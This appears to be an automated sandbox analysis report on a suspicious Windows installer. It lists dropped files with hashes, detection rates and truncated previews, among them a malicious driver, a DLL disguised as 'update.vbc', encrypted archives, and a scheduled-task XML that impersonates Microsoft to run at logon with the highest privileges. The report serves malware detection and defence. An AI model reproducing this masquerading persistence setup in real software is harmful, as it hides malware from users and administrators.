                          Preview:7z..'....G8{p$......@..........0..$D.#'7..^..G.....W.K^.IC;.k...)_...S...2..x.....?(..Rj.g.......B...C..NK.B0s..L?.$..].....$r..E.]~...~K..E..3.......t..k..J......B...4.?!..6r.Qqc.5.r...\..,A.JF.J...Vb..b...M.=^.K7..e..]...X.%^3T...D.y..e2..>...k...\...S.C....')......hhV..K...z4..$d....a[.....6.&.D.:.=^.8.M[....n..i[....]..Y.4...NpkjU..;..W5.#.p.8?u....!.......u.[?.$..^.}f.A..G.N...b7.*...!!.(.....Gc..........Dg....Z.*.#.\".e.m.).t.5..r...6"....Q......fx..W......k..K7^."C.4*Z.{.^WG.....Z..P......Z....7R.....5hy...s....b.....7.V.....k.=.y.i.i......Y.......FY$.|T.5..V...E|...q.........].}bl...y.....;...q....-a..RP3..L~k....|..p_......."......rJz."..v......Z....l1.O.N...Di...O.:m.X...W.......x..}..>ktk.,.~...n-.m..`...G......$.....].lPx..<..9.m4.n...d....G...{'.a........u).R.+.....y.`.p...1@..!..b...J.W..Vt,......h...k....W.,..@Sd.<ZG......}&.R.]p(Y...o...r.4m:.J`.U..S5.iN...^!Y..hHP.B.58....JvB.K.k;...4........\.6=&erz..2..&...Z.C...h_.

                          C:\Program Files (x86)\Windows NT\locale7.bin

                          Download File
                          Process:C:\Program Files (x86)\Windows NT\7zr.exe
                          File Type:data
                          Category:dropped
                          Size (bytes):29730
                          Entropy (8bit):7.994290657653607
                          Encrypted:true
                          SSDEEP:768:e7fyvDZi63BuPi2zBBMqUp6fJzwyQb91SPlssLK4:AfKNiG/2vMx6fJzwVb2tss7
                          MD5:2C3E0D1FB580A8F0855355CC7D8D4F7A
                          SHA1:177E4A0B7C4BC8ACE0F46127398808E669222515
                          SHA-256:9818FEBDE34D7E9900EB1C7A32983CA60C676BE941E2BC1ED9FBD5A187C6F544
                          SHA-512:B9410FC8F5BE02130D50E7389F9A334DD2F2A47694E88FBB9FB4561BD3296F894369B279546EEBB376452DF795C39D87A67C6EE84C362F47FA19CF4C79E5574E
                          Malicious:false
                          Preview:.@S....*z.p,..................kcn..a.^.<..=......7`....6..!`...W.,2u...K.r.1.......1...g<wkw.....q..VfaR...n.h.0b[.h.V$..7.7'd.....T.....`.....)k.....}..........bW'.t..@*.%e5....#.6.g.R.......,W....._..G.d...1..e/...e7....E.....b....#Z,#...@.J.j?....q.ZR.c.b.V....Y-.......3..&E...a.2vg$..z...M9.[......_.1U....A...L.0+3U.[)8...D........5......[..-.u...ib...[..I-....#|j..d..D.S.'.....J.`.....b..y...Iu.D.....2.r}.4....<K.%....0X..X[5.sD...Xh.(G...Z;.."..o..%.......,.y..\..M6.+,.]c..t.:.|...p%.../1%.{>..r..B..yA.......}.`.#.X....Rl`.6\~k.P8..C....V\^..2.7...... h. .>....}..u)..4..w..............^N...@.v....d.P...........IA.. G?..YJ>._La..Y.@.8N.a...BK.....x.T....u.....\x.t...~.2p.M..+.R&w.......7c!v.@..RGf.F.>^+.b=........@l.T5.:........#}.%>.-.C.[XR.TG.\..'....MH..x..Y...cL........y.>....%...:.S.W^..k.EE.5O`.6<5-kh_...."95..:p....P.jk`....b.7.Z.8Y....H(j2y..`d.q;RyZ.5$..3.;......0,......+O.....L.,..u.s....S.1o.g...l"..e.....Cy<....I.+..B@......~.0...<.

                          C:\Program Files (x86)\Windows NT\locale7.dat

                          Download File
                          Process:C:\Users\user\AppData\Local\Temp\is-8E4J0.tmp\#U5b89#U88c5#U7a0b#U5e8f_1.1.6.tmp
                          File Type:7-zip archive data, version 0.4
                          Category:dropped
                          Size (bytes):29730
                          Entropy (8bit):7.994290657653608
                          Encrypted:true
                          SSDEEP:768:0AnbQm4/4qQyDC44LY4VfQ8aN/DObt1dSt3OUqZNKME:0ab6c4oY0aBDObjot+Uqu7
                          MD5:A9C8A3E00692F79E1BA9693003F85D18
                          SHA1:5ED62E15A8AC5D49FD29EF2A8DC05D24B2E0FC1F
                          SHA-256:B88E3170EC6660651AF1606375F033F42D3680E4365863675D0E81866E086CC3
                          SHA-512:8354B80622A9808606F1751A53F865C341FF2CE1581B489B50B1181DAA9B2C0A919F94137F47898A4529ECCCD96C43FCCD30BCDF6220FA4017235053AF0B477D
                          Malicious:false
                          Preview:7z..'....G..s......2......../.....h..f...H=...v.:..Q.I..OP.....p..qfX.M.J..).9;...sp......ns./..;w....3.<..m..M.L...k..L..h[-Dnt.*'5....M(w%...HVL..F&......a...R.........SF.2....m@X&X5.!....ER......]xm.....\.....=.q.I.}v.l#.B........:.e....b6.l.d..O......H.C..$.',.B..Q\..\.B.%...g...3?.....*.XuE.J.6`.../...W.../......b..HL?...E.V[...^.~.&..I,..xUH..2V..H..$..;.....c.6.o........g.}.u:.X....9...|Ynic.*.....ooK..>..M~yb..0W....^..J(S......Q?...#.i.1..#.._.9..2E.S7c.....{..'...j.A.p......dS]......i.!..YS...%.Q<..\.0.....FNw....e...2...$..$4..Pv.R...mv...-.b.T.)..r*..!..).n4.+.l[.N...4qN....w.B..[......<U.etA.A....SB..^y.......^0.f._.&..Z.zV.%.R.f_dz.,E..JJ..%.R.7.3m.:..;.`...AoHLHC..|..)f...C....$...E....H"x..F....wW...3"......Y.*Y.....5....,E...tn.KS...2......w\Z..1.".O.=+..A...2.....A.........k. c..../2..i!q..q...u.'.m.6.j.\.....x...S....$....*.&(.).^..f.d.g"j..#^....W.]{.C.?2Z.'X...5.._@..q.j..Xb...n{1..<.i...'r...7'.F.L\(.8

                          C:\Program Files (x86)\Windows NT\res.dat

                          Download File
                          Process:C:\Users\user\AppData\Local\Temp\is-8E4J0.tmp\#U5b89#U88c5#U7a0b#U5e8f_1.1.6.tmp
                          File Type:7-zip archive data, version 0.4
                          Category:dropped
                          Size (bytes):3252513
                          Entropy (8bit):7.999943965711188
                          Encrypted:true
                          SSDEEP:98304:+XXOlk822gQUKZ2ecz7upfuutUiyfLOjrWZ:Uel0pKZ2ec/upfuwylZ
                          MD5:8CD35311B784040092611827E49F8BE3
                          SHA1:909D769731A81DAA04CA25A1F325206ADC22BA20
                          SHA-256:9CD7F9F2281FFF8F455A731FF75E3670C9A24028840202AF378FBE3C5089CA66
                          SHA-512:2CA2DE6081D67D852775C81620BC18A4D16849B4177A7F083CD372173BB37BE6C8316921FEFC1BFB81E0731FAE320586E503E2C9FF7C41155FED16ADECA45DA4
                          Malicious:false
                          Preview:7z..'...?,....1.....A.............+?..<y...m.).]..%......)".Cy...8BP9......k...,.. .N#..]....r.`...l.......s.<.w}H"....pn.ChU..q+......Ho.%...b...9.W\....w.c...Fp.J..>.........;..MX 4h..k...#.....D(.N....d.z..d.s..=.....Q....S.t.m=...=.(.jo)....$...C...$i7........j...R%.e..L.@!V!Vb.3..;......?..l.0....:7yj.t.......].Q..#..SN....e.88Y..J|...L..;...k.lM....k].~.9.iF.v.&.APW.G..0...!..Ix..U.l...hF...r.....o........\wl...p.(..|is.7..o.~.K.3.y.. v.h..!....3E9..Udf.@....8.~...r...<^{.n./Fk.nP....P..y..[.-.<..E\..*.....?.t.6t~R.C...~T.Q^..E....Be>.B..+%...a,.&.[.ff..$....'.iS=T.ke.g.x.8......M....+..Ib('.*.'g...2.N$.T....W..a..V.{.@p..'...o......].......t...&.X.J.K..lR%{b..W+.......f.`...L,.V....Yp^../....(...$k..V..z..7.~.r.7.i..(..H$.S1#...E.R5....S...iX3..9......Y.No...2<../,..+.S....&...).....,C.&/3`....,g...i.hN9..2....U1...<D...X.en.+.D...k@..[....Y.U.KWZJZ`%.........71..V.....e..*!-..b[..!..;...<!....c5.q..(jNzm/..2.W..$....=..9,.%j.lq4

                          C:\Program Files (x86)\Windows NT\tProtect.dll

                          Download File
                          Process:C:\Program Files (x86)\Windows NT\7zr.exe
                          File Type:PE32+ executable (native) x86-64, for MS Windows
                          Category:dropped
                          Size (bytes):63640
                          Entropy (8bit):6.482810107683822
                          Encrypted:false
                          SSDEEP:768:4l2NchwQqrK3SBq3Xf2Zm+Oo1acHyKWkm9loSZVHT4yy5FPSFlWd/Ce34nqciC50:kgrFq3OVgUgla/4nqy5K2/zW
                          MD5:B4EAACCE30F51EAF2A36CEA680B45A66
                          SHA1:94493D7739C5EE7346DA31D9523404D62682B195
                          SHA-256:15E84D040C2756B2D1B6C3F99D5A1079DC8854844D3C24D740FAFD8C668E5FB9
                          SHA-512:16F46ABE2DD8C1A95705C397B0A5A0BC589383B60FE7C4F25503781D47160C0D68CBA0113BA918747115EF27A48AB7CA7F56CC55920F097313A2DA73343DF10B
                          Malicious:true
                          Antivirus:
                          • Antivirus: ReversingLabs, Detection: 9%
                          • Antivirus: Virustotal, Detection: 6%, Browse
                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......s.[.7.5N7.5N7.5N7.4NX.5NA'NN4.5NA'HN5.5N.|XN4.5N.|HN6.5NA'XN6.5N.|DN0.5N.|IN6.5N.|MN6.5NRich7.5N........................PE..d....(gK..........".........."............................................... ..............................................................d...(........................(.......... ................................................................................text............................... ..h.rdata..............................@..H.data...............................@....pdata..............................@..HINIT................................ ....rsrc...............................@..B.reloc..0...........................@..B................................................................................................................................................................................................................

                          C:\Program Files (x86)\Windows NT\task.xml

                          Download File
                          Process:C:\Users\user\AppData\Local\Temp\is-8E4J0.tmp\#U5b89#U88c5#U7a0b#U5e8f_1.1.6.tmp
                          File Type:ASCII text
                          Category:dropped
                          Size (bytes):4096
                          Entropy (8bit):3.3443983145211007
                          Encrypted:false
                          SSDEEP:48:dXKLzDlnyL6w0QldOVQOj933ODOiTdKbKsz72eW+5yF:dXazDlnHwhldOVQOj6dKbKsz7
                          MD5:1E67E91688292692932CD9096EDEA2BD
                          SHA1:AA8859477C235F2F194FC7C4D75EF4C082A6864B
                          SHA-256:ED20E6ED002708041CC98B046F976B2BE43685B258AE6461F291CF73F7128924
                          SHA-512:7C6DE3E403542FE6D33C75F286212A114C7112B8401EAC8323EDBE856CADE905CE11E0B9C4083AE01A711E6B1EC12329CBF43AB0B585BCB56FE8A0F151B47B3E
                          Malicious:false
                          Preview:<Task xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">. <RegistrationInfo>. <Date>2005-10-11T13:21:17-08:00</Date>. <Author>Microsoft Corporation</Author>. <Version>1.0.0</Version>. <Description>Microsoft</Description>. <URI>\turminoob</URI>. </RegistrationInfo>. <Triggers>. <LogonTrigger>. <Enabled>true</Enabled>. <UserId>user</UserId>. </LogonTrigger>. </Triggers>. <Principals>. <Principal id="System">. <UserId>user</UserId>. <RunLevel>HighestAvailable</RunLevel>. </Principal>. </Principals>. <Settings>. <MultipleInstancesPolicy>Parallel</MultipleInstancesPolicy>. <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>. <StopIfGoingOnBatteries>false</StopIfGoingOnBatteries>. <AllowHardTerminate>false</AllowHardTerminate>. <StartWhenAvailable>true</StartWhenAvailable>. <RunOnlyIfNetworkAva

                          C:\Program Files (x86)\Windows NT\trash

                          Download File
                          Process:C:\Program Files (x86)\Windows NT\7zr.exe
                          File Type:OpenPGP Public Key
                          Category:dropped
                          Size (bytes):3002302
                          Entropy (8bit):7.9999367110713795
                          Encrypted:true
                          SSDEEP:49152:fabTxPp50+YBXeTFfQm4v2/gx/4Qkf6e6fKZXN0AkdcXjMjgPXbqmztLN+DWm+ar:fMPp5FYeTFQvZ47wQNPkSTMUPpztL8Dx
                          MD5:8862E3A18FBF883677A39AA59DE0EAAD
                          SHA1:FAE1A1A5E1B34DFF73AD1C4B680C76EE5EDD52A0
                          SHA-256:229618C87597E665556EA6C0F03F70FC56C94E09D031B2EE821B91EDD6576601
                          SHA-512:1E66A5CF02A694B6D014E7A9F849A857CF97C97BC95F834BCEE8138CD4D2AF9A6C341575B3DF494EDBE600A883E6D7A9882D455E17A6DC942D19D09B5BBCF3B9
                          Malicious:false
                          Preview:.qoM....</P.S.H..}.+..D.(..........u....t..?d.S..H.} _......X.2..l.i..k....Xf/H....0?Ar.........4Saj....,..p.......ti.[.:z.{..Nh...=.J?.).K.R..eg..+.R..k.N..f.......2..tH.....|z.:.C.9.y...G..m...vyV].".>0o..CL.7...^.k\.S..........C...-.f.."...{..F5...>.d..@..;..Y........[...*........Y...T....u.?.i.h........S.:t]r{...mg..D.--...].h.vh.W...<TY-E..0..W'6.?.I..HS?...../...g.d.U$......t...;..yDk...I...0...bOx........[.]@....7.d.....H.......f.z1wq..n.Bb...?.Q..:.l.P..:..e...A......5....y..k.uQz.j.V!D.A?..BIH.'...8.l.bw...W......]....sh$Jq....-..........I.E.....|..3`"D.....^..J:4..8.......?.O...jC.xb...,.w>~.,....f.......G.....f|+.Y..0.%...7.....k..A.^_...]..<..}..8..*...Jb...SU...%g>.;.k`............6...kn.\........6M..T..l.!......O..vXR...........cW.....S......U$P[..-.?./..b.=...].7....bri%.8.....$..^...j.O:.I..~...+....>..|.Q|u.m..A.34.l.....\k..S.~}$.3nP...{..._.....kH.W.j..=....U>..\.L[5.t.U...k..Rce.+........)Z*A.AV..=[&......].../u.C$..)....M}$

                          C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                          Download File
                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                          File Type:data
                          Category:dropped
                          Size (bytes):64
                          Entropy (8bit):1.1628158735648508
                          Encrypted:false
                          SSDEEP:3:NlllulFgtj:NllUa
                          MD5:E986DDCA20E18C878305AA21342325F6
                          SHA1:AE6890EE7BB81A051A4F4079F549DEBCCE0F82C9
                          SHA-256:9624DAA47DF80C2229877179550D8373CAEEEAE25A8123698D7A516AD455DD15
                          SHA-512:8B0CD5C1F0BAECA299669D6A0CB74F9315E90B05EDEA16C92B92D9927D3D07225AC5DAE9941CF339E1CED349BA8129F56F118CF89AB86CF8DAAAFFDB8EC8B56D
                          Malicious:false
                          Preview:@...e................................................@..........

                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_4d54hbo1.qno.psm1

                          Download File
                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                          File Type:ASCII text, with no line terminators
                          Category:dropped
                          Size (bytes):60
                          Entropy (8bit):4.038920595031593
                          Encrypted:false
                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                          Malicious:false
                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_e0l2vn2p.lvm.psm1

                          Download File
                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                          File Type:ASCII text, with no line terminators
                          Category:dropped
                          Size (bytes):60
                          Entropy (8bit):4.038920595031593
                          Encrypted:false
                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                          Malicious:false
                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_lpdkazvd.jzm.ps1

                          Download File
                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                          File Type:ASCII text, with no line terminators
                          Category:dropped
                          Size (bytes):60
                          Entropy (8bit):4.038920595031593
                          Encrypted:false
                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                          Malicious:false
                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_oprjj5ry.l1k.ps1

                          Download File
                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                          File Type:ASCII text, with no line terminators
                          Category:dropped
                          Size (bytes):60
                          Entropy (8bit):4.038920595031593
                          Encrypted:false
                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                          Malicious:false
                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                          C:\Users\user\AppData\Local\Temp\is-8E4J0.tmp\#U5b89#U88c5#U7a0b#U5e8f_1.1.6.tmp

                          Download File
                          Process:C:\Users\user\Desktop\#U5b89#U88c5#U7a0b#U5e8f_1.1.6.exe
                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                          Category:dropped
                          Size (bytes):3366912
                          Entropy (8bit):6.530564866469498
                          Encrypted:false
                          SSDEEP:98304:nJYVM+LtVt3P/KuG2ONG9iqLRQE9333T:2VL/tnHGYiql5F
                          MD5:F71908CEAB1076D5D4250CBFCB02E6B2
                          SHA1:2605DDF88D6191E54CE4935F5F652AD2EB3D90BF
                          SHA-256:41942D878571CFFA23A299A9CEC78B002C6B0B03C640A51C50049FA2A8C7698C
                          SHA-512:FE85D2393D6BC4D92FCAB43667CD16C4B69F2E757D6952D647119B1B15A113FBA1E117CFAD64B7851EB24400AD3DE4FD2A5BAA42271C13054EA9CC90E3DA825A
                          Malicious:true
                          Antivirus:
                          • Antivirus: Virustotal, Detection: 1%, Browse
                          Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L.....f..................*...........*.......*...@..........................04...........@......@...................P,.n.....,.j:...P0.......................,.<............................p,.......................,......@,.(....................text.....*.......*................. ..`.itext..$.....*..0....*............. ..`.data.........*.......*.............@....bss.....|....+..........................idata..j:....,..<...f+.............@....didata.(....@,.......+.............@....edata..n....P,.......+.............@..@.tls....X....`,..........................rdata..]....p,.......+.............@..@.reloc..<.....,.......+.............@..B.rsrc........P0......./.............@..@.............04......`3.............@..@................

                          C:\Users\user\AppData\Local\Temp\is-DNFUF.tmp\_isetup\_setup64.tmp

                          Download File
                          Process:C:\Users\user\AppData\Local\Temp\is-8E4J0.tmp\#U5b89#U88c5#U7a0b#U5e8f_1.1.6.tmp
                          File Type:PE32+ executable (console) x86-64, for MS Windows
                          Category:dropped
                          Size (bytes):6144
                          Entropy (8bit):4.720366600008286
                          Encrypted:false
                          SSDEEP:96:sfkcXegaJ/ZAYNzcld1xaX12p+gt1sONA0:sfJEVYlvxaX12C6A0
                          MD5:E4211D6D009757C078A9FAC7FF4F03D4
                          SHA1:019CD56BA687D39D12D4B13991C9A42EA6BA03DA
                          SHA-256:388A796580234EFC95F3B1C70AD4CB44BFDDC7BA0F9203BF4902B9929B136F95
                          SHA-512:17257F15D843E88BB78ADCFB48184B8CE22109CC2C99E709432728A392AFAE7B808ED32289BA397207172DE990A354F15C2459B6797317DA8EA18B040C85787E
                          Malicious:false
                          Antivirus:
                          • Antivirus: ReversingLabs, Detection: 0%
                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......^...............l...............=\......=\......=\......Rich............................PE..d.....R..........#............................@.............................`.......,......................................................<!.......P..H....@..0.................................................................... ...............................text............................... ..`.rdata..|.... ......................@..@.data...,....0......................@....pdata..0....@......................@..@.rsrc...H....P......................@..@................................................................................................................................................................................................................................................................................................................................

                          C:\Users\user\AppData\Local\Temp\is-DNFUF.tmp\update.vbc

                          Download File
                          Process:C:\Users\user\AppData\Local\Temp\is-8E4J0.tmp\#U5b89#U88c5#U7a0b#U5e8f_1.1.6.tmp
                          File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                          Category:dropped
                          Size (bytes):3621376
                          Entropy (8bit):7.006090025798393
                          Encrypted:false
                          SSDEEP:98304:UXTNS5omKHixBbVZ9yogz/lWGAxNRie71MzSRMYuefCG/gZD:U5SG7Hwke71MzxY/UZD
                          MD5:FCADEAE28FCC52FD286350DFEECD82E5
                          SHA1:48290AA098DEDE53C457FC774063C3198754A161
                          SHA-256:34063D8A5CC7DE10C1514FD21463D4E5A0E99CFAB7A8EE1168E84EDE8823EDFB
                          SHA-512:56428AFDEEE8774518FE206AE4CD017F552F947508B87785A3BD960B14364F990F54E73F01C2A5CAF9B1862DADDD634BB894882B00B60102675D63F52245A41F
                          Malicious:true
                          Antivirus:
                          • Antivirus: ReversingLabs, Detection: 26%
                          Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L...D.jg...........!..........................................................7...........@.........................8s.......y..<....p7.X.....................7.d?..........................h9.......................{...............................text...P........................... ..`.rdata..4...........................@..@.data...............................@....00cfg........(......T(.............@..@.tls..........(......V(.............@....voltbl.F.....(......X(..................aQ#..........(......Z(............. ..`.rsrc...X....p7.......6.............@..@.reloc..d?....7..@....7.............@..B................................................................................................................................................................................................................................................................................

                          C:\Users\user\AppData\Local\Temp\is-NF2T5.tmp\#U5b89#U88c5#U7a0b#U5e8f_1.1.6.tmp

                          Download File
                          Process:C:\Users\user\Desktop\#U5b89#U88c5#U7a0b#U5e8f_1.1.6.exe
                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                          Category:dropped
                          Size (bytes):3366912
                          Entropy (8bit):6.530564866469498
                          Encrypted:false
                          SSDEEP:98304:nJYVM+LtVt3P/KuG2ONG9iqLRQE9333T:2VL/tnHGYiql5F
                          MD5:F71908CEAB1076D5D4250CBFCB02E6B2
                          SHA1:2605DDF88D6191E54CE4935F5F652AD2EB3D90BF
                          SHA-256:41942D878571CFFA23A299A9CEC78B002C6B0B03C640A51C50049FA2A8C7698C
                          SHA-512:FE85D2393D6BC4D92FCAB43667CD16C4B69F2E757D6952D647119B1B15A113FBA1E117CFAD64B7851EB24400AD3DE4FD2A5BAA42271C13054EA9CC90E3DA825A
                          Malicious:true
                          Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L.....f..................*...........*.......*...@..........................04...........@......@...................P,.n.....,.j:...P0.......................,.<............................p,.......................,......@,.(....................text.....*.......*................. ..`.itext..$.....*..0....*............. ..`.data.........*.......*.............@....bss.....|....+..........................idata..j:....,..<...f+.............@....didata.(....@,.......+.............@....edata..n....P,.......+.............@..@.tls....X....`,..........................rdata..]....p,.......+.............@..@.reloc..<.....,.......+.............@..B.rsrc........P0......./.............@..@.............04......`3.............@..@................

                          C:\Users\user\AppData\Local\Temp\is-Q5IJ4.tmp\_isetup\_setup64.tmp

                          Download File
                          Process:C:\Users\user\AppData\Local\Temp\is-NF2T5.tmp\#U5b89#U88c5#U7a0b#U5e8f_1.1.6.tmp
                          File Type:PE32+ executable (console) x86-64, for MS Windows
                          Category:dropped
                          Size (bytes):6144
                          Entropy (8bit):4.720366600008286
                          Encrypted:false
                          SSDEEP:96:sfkcXegaJ/ZAYNzcld1xaX12p+gt1sONA0:sfJEVYlvxaX12C6A0
                          MD5:E4211D6D009757C078A9FAC7FF4F03D4
                          SHA1:019CD56BA687D39D12D4B13991C9A42EA6BA03DA
                          SHA-256:388A796580234EFC95F3B1C70AD4CB44BFDDC7BA0F9203BF4902B9929B136F95
                          SHA-512:17257F15D843E88BB78ADCFB48184B8CE22109CC2C99E709432728A392AFAE7B808ED32289BA397207172DE990A354F15C2459B6797317DA8EA18B040C85787E
                          Malicious:false
                          Antivirus:
                          • Antivirus: ReversingLabs, Detection: 0%
                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......^...............l...............=\......=\......=\......Rich............................PE..d.....R..........#............................@.............................`.......,......................................................<!.......P..H....@..0.................................................................... ...............................text............................... ..`.rdata..|.... ......................@..@.data...,....0......................@....pdata..0....@......................@..@.rsrc...H....P......................@..@................................................................................................................................................................................................................................................................................................................................

                          C:\Users\user\AppData\Local\Temp\is-Q5IJ4.tmp\update.vbc

                          Download File
                          Process:C:\Users\user\AppData\Local\Temp\is-NF2T5.tmp\#U5b89#U88c5#U7a0b#U5e8f_1.1.6.tmp
                          File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                          Category:dropped
                          Size (bytes):3621376
                          Entropy (8bit):7.006090025798393
                          Encrypted:false
                          SSDEEP:98304:UXTNS5omKHixBbVZ9yogz/lWGAxNRie71MzSRMYuefCG/gZD:U5SG7Hwke71MzxY/UZD
                          MD5:FCADEAE28FCC52FD286350DFEECD82E5
                          SHA1:48290AA098DEDE53C457FC774063C3198754A161
                          SHA-256:34063D8A5CC7DE10C1514FD21463D4E5A0E99CFAB7A8EE1168E84EDE8823EDFB
                          SHA-512:56428AFDEEE8774518FE206AE4CD017F552F947508B87785A3BD960B14364F990F54E73F01C2A5CAF9B1862DADDD634BB894882B00B60102675D63F52245A41F
                          Malicious:true
                          Antivirus:
                          • Antivirus: ReversingLabs, Detection: 26%
                          Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L...D.jg...........!..........................................................7...........@.........................8s.......y..<....p7.X.....................7.d?..........................h9.......................{...............................text...P........................... ..`.rdata..4...........................@..@.data...............................@....00cfg........(......T(.............@..@.tls..........(......V(.............@....voltbl.F.....(......X(..................aQ#..........(......Z(............. ..`.rsrc...X....p7.......6.............@..@.reloc..d?....7..@....7.............@..B................................................................................................................................................................................................................................................................................

                          \Device\ConDrv

                          Download File
                          Process:C:\Program Files (x86)\Windows NT\7zr.exe
                          File Type:ASCII text, with CRLF, CR line terminators
                          Category:dropped
                          Size (bytes):406
                          Entropy (8bit):5.117520345541057
                          Encrypted:false
                          SSDEEP:6:AMpUMcvtFHcAxXF2SaioBGWOSTIPAiTVHsCgN/J2+ebVcdsvUGrFfpap1tNSK6n:pCXVZRwXkWDThGHs/JldsvhJA1tNS9n
                          MD5:9200058492BCA8F9D88B4877F842C148
                          SHA1:EED69748A26CFAF769EF589F395A162E87005B36
                          SHA-256:BAFB8C87BCB80E77FF659D7B8152145866D8BD67D202624515721CBF38BA8745
                          SHA-512:312AB0CBA3151B3CE424198C0855EEE39CC06FC8271E3D49134F00D7E09407964F31D3107169479CE4F8FD85D20BBD3F5309D3052849021954CD46A0B723F2A9
                          Malicious:false
                          Preview:..7-Zip (a) 23.01 (x86) : Copyright (c) 1999-2023 Igor Pavlov : 2023-06-20....Scanning the drive for archives:.. 0M Scan. .1 file, 31890 bytes (32 KiB)....Extracting archive: locale3.dat..--..Path = locale3.dat..Type = 7z..Physical Size = 31890..Headers Size = 354..Method = LZMA2:16 LZMA:16 BCJ2 7zAES..Solid = -..Blocks = 1.... 0%. .Everything is Ok....Size: 63640..Compressed: 31890..

                          Static File Info

                          General

                          File type:PE32 executable (GUI) Intel 80386, for MS Windows
                          Entropy (8bit):7.967601185321986
                          TrID:
                          • Win32 Executable (generic) a (10002005/4) 98.04%
                          • Inno Setup installer (109748/4) 1.08%
                          • InstallShield setup (43055/19) 0.42%
                          • Win32 EXE PECompact compressed (generic) (41571/9) 0.41%
                          • Win16/32 Executable Delphi generic (2074/23) 0.02%
                          File name:#U5b89#U88c5#U7a0b#U5e8f_1.1.6.exe
                          File size:9'897'435 bytes
                          MD5:1892cf920ffe70868b967804d9222b14
                          SHA1:2b2a0a6bbd472bf5aee0fb476d4ddd07f0c234dd
                          SHA256:459794c80f6ede491eefd8c6eabf5abe8cbd29a4d224e35072b38af2610f07d0
                          SHA512:ebccfdd092539d0cbca3859111070b502eef0452bcd9cbb6805031af0a1a868480d6d4a54a5a0af86a4622a606447fa1be7b4220241c3a4ab370a1af65f60e5f
                          SSDEEP:196608:lHDsQ/dcSd7VHeeAXOZYEBlg5aiixZ4cENKegvJ4158YPVuyN3gJHu:ljsQ/dcSJVOXLEBlg0vyNyvm1OFyGJO
                          TLSH:C9A62322F2CBD43DE41D0B3719B3A65494FB6A206423AE578AECB4ACCF351601D3E657
                          File Content Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7.......................................................................................................................................

                          File Icon

                          Icon Hash:0c0c2d33ceec80aa

                          Static PE Info

                          General

                          Entrypoint:0x4a83bc
                          Entrypoint Section:.itext
                          Digitally signed:false
                          Imagebase:0x400000
                          Subsystem:windows gui
                          Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                          DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
                          Time Stamp:0x6690DABD [Fri Jul 12 07:26:53 2024 UTC]
                          TLS Callbacks:
                          CLR (.Net) Version:
                          OS Version Major:6
                          OS Version Minor:1
                          File Version Major:6
                          File Version Minor:1
                          Subsystem Version Major:6
                          Subsystem Version Minor:1
                          Import Hash:40ab50289f7ef5fae60801f88d4541fc

                          Entrypoint Preview

                          Instruction
                          push ebp
                          mov ebp, esp
